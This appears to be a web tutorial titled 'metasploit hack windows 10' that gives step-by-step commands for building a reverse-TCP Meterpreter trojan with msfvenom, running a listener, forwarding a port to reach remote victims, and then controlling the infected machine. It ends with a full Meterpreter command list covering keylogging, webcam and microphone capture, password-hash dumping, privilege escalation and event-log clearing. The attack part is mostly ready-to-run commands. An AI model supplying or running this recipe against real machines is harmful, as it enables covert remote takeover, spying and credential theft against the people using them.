metasploit hack windows 10

Using Metasploit that comes pre-installed on Kali Linux


  • It’s recommended you verify Kali Linux is up-to-date before following the instructions below
    • sudo apt update
    • sudo apt upgrade
  • This is for security tests on a local network. If your computer is at another location or has a different public ip address, you would need to forward port 444 to your computer’s ip address from your wan ip on your firewall/router and in the parts below where your ip is referenced you would need to use your public ip address instead.

Generate a Trojan

  • from command line (root@kali:~#) run the following command
  • (root@kali:~#)
    msfvenom -p windows/meterpreter/reverse_tcp platform windows -a x86 -f exe LHOST="your computer ip without quotes" LPORT=444 -o /root/Desktop/trojan.exe
  • A trojan will be generated in the desktop. keep it aside and move on to handler section.

Set up Metasploit to listen for communication from the Trojan

    1. Open metasploit
      • you can do this by opening a command prompt and typing ‘msfconsole’ or by clicking on applications -> metasploit
    2. msfconsole will take a moment to load
    3. msf> use multi/handler
    4. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    5. msf exploit(handler) > set LPORT 444
      • This sets the port that will be used to transmit data from the infected computer to your own
    6. msf exploit(handler) > set LHOST “your computer ip”
      • This is your own computer’s ip address
    7. msf exploit(handler) > exploit
      • This starts the exploit program
      • Started reverse handler on your.ip:444
      • Starting the payload handler… (now your computer is waiting for a connection from an infected computer)

Execute the payload

Getting an executable file past a computer’s antivirus/firewall is not covered here. Realtime protection will likely need to be disabled on the windows 10 computer for the trojan to work as-is. Once the trojan is on the windows 10 computer and executed, a meterpreter session will be spawned on your computer that is running metasploit.

  • Started reverse handler on (your computer’s ip):444
  • Starting the payload handler…
  • Sending stage (83170 bytes) to
  • Meterpreter session 1 opened (your computer’s ip:444 -> windows 10 computer ip:randomport) at 2017-05-17 03:20:45 -0500
    meterpreter >

Use Meterpreter to run commands on the controlled system

Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more.

    • Use this command to run vnc session and spy the target
      meterpreter > run vnc
    • use help command to see the whole list of commands
meterpreter > help

Core Commands

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for 'load'
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory

Stdapi: Networking Commands

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

Stdapi: System Commands

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >